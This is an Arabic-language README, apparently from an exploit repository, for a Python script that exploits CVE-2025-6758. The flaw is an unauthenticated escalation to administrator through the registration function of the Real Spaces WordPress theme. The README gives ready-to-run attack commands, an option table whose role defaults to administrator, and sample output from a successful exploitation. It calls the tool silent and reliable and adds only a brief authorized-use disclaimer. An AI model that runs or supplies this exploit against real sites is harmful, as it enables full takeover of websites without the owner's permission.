
Real Spaces - WordPress Properties Directory Theme <= 3.6 - تصعيد امتيازات بدون مصادقة إلى المسؤول
imic_agent_registerCVE-2025-6758
CVSS Score: 9.8 (حرجة)
Real Spaces - WordPress Properties Directory Theme المخصص لمنصة WordPress معرّض لثغرة تصعيد الامتيازات عبر الدالة imic_agent_register في جميع الإصدارات حتى 3.6 ضمنًا.
تنشأ هذه الثغرة بسبب القيود غير الكافية على تعيين الأدوار أثناء عملية التسجيل، مما يسمح للمهاجمين غير المصادقين بتحديد دورهم بشكل تعسفي، بما في ذلك دور Administrator، عند تسجيل مستخدم جديد.
تتيح هذه الثغرة الحرجة للمهاجمين عن بُعد الحصول على وصول إداري كامل إلى مواقع WordPress التي تستخدم نسخًا معرّضة للخطر من القالب، مما يهدد سلامة وأمن النظام المتأثر.
CVE-2025-6758.py هو سكربت احترافي للاستغلال والأتمتة مكتوب بلغة Python لعرض هذه الثغرة واستغلالها.
صُمم السكربت لاختباري الاختراق والباحثين في مجال الأمن، حيث يوفر اكتشافًا آليًا واستخراجًا للـ nonce واستغلالًا للثغرة بطريقة موثوقة للغاية ونمطية وصامتة.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username تعيين اسم مستخدم مخصص (الافتراضي: Nxploited)--password تعيين كلمة مرور مخصصة (الافتراضي: 123456789)--email تعيين بريد إلكتروني مخصص (الافتراضي: [email protected])--position تعيين قيمة منصب مخصصة (الافتراضي: Nxploitedadmin)--role تعيين دور المستخدم (الافتراضي: administrator)--max-pages الحد الأقصى للصفحات التي يتم الزحف إليها لاكتشاف الـ nonce (الافتراضي: 30)--max-depth أقصى عمق للزحف عبر الروابط (الافتراضي: 2)--scan-common-paths فحص مسارات إضافية للتسجيل/الإضافات/القالب--ajax-path نقطة نهاية AJAX POST مخصصة (الافتراضي: wp-admin/admin-ajax.php)--verify-ssl تفعيل التحقق من شهادة SSL--cookie-save مسار حفظ ملفات تعريف ارتباط الجلسةpython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
عند نجاح الاستغلال، سيُخرج السكربت ما يلي:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
إذا فشل الاستغلال أو لم يتم العثور على الـ nonce، فستظهر رسائل خطأ وصفية وتلميحات للمساعدة في استكشاف الأخطاء وإصلاحها.
هذا السكربت مخصص لأغراض تعليمية وبحثية ولاختبار الاختراق المصرح به فقط.
أي استخدام غير مصرح به ضد مواقع الويب أو الأنظمة دون الحصول على إذن كتابي صريح من المالك محظور تمامًا وقد يعد غير قانوني.
لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناتجة عن استخدام هذا السكربت.
📧 البريد الإلكتروني: [email protected]
📨 تيليجرام: @Kxploit
📡 قناة تيليجرام: @KNxploited
بواسطة: Nxploited ( Khaled Alenazi )
| الوسيط | القيمة الافتراضية | الوصف |
|---|
--username | Nxploited | تعيين اسم مستخدم مخصص للتسجيل |
--password | 123456789 | تعيين كلمة مرور مخصصة للتسجيل |
--email | [email protected] | تعيين عنوان بريد إلكتروني مخصص |
--position | Nxploitedadmin | تعيين قيمة منصب مخصصة |
--role | administrator | تعيين دور التسجيل (يُوصى بدور administrator للاستغلال) |
--max-pages | 30 | الحد الأقصى للصفحات التي يتم الزحف إليها لاكتشاف الـ nonce |
--max-depth | 2 | أقصى عمق للزحف عبر الروابط |
--scan-common-paths | None | فحص مسارات إضافية للتسجيل/الإضافات/القالب بحثًا عن الـ nonce (flag فقط) |
--ajax-path | wp-admin/admin-ajax.php | نقطة نهاية AJAX POST مخصصة |
--verify-ssl | None | تفعيل التحقق من شهادة SSL (flag فقط) |
--cookie-save | None | مسار حفظ ملفات تعريف ارتباط الجلسة (بصيغة pickle) |
--save-json | None | مسار حفظ نتائج اكتشاف الـ nonce بصيغة JSON |
--debug | None | تفعيل تسجيل التصحيح وطباعة مقتطفات HTML/JS (flag فقط) |
--save-json--debug تفعيل تسجيل التصحيح وطباعة مقتطفات HTML/JS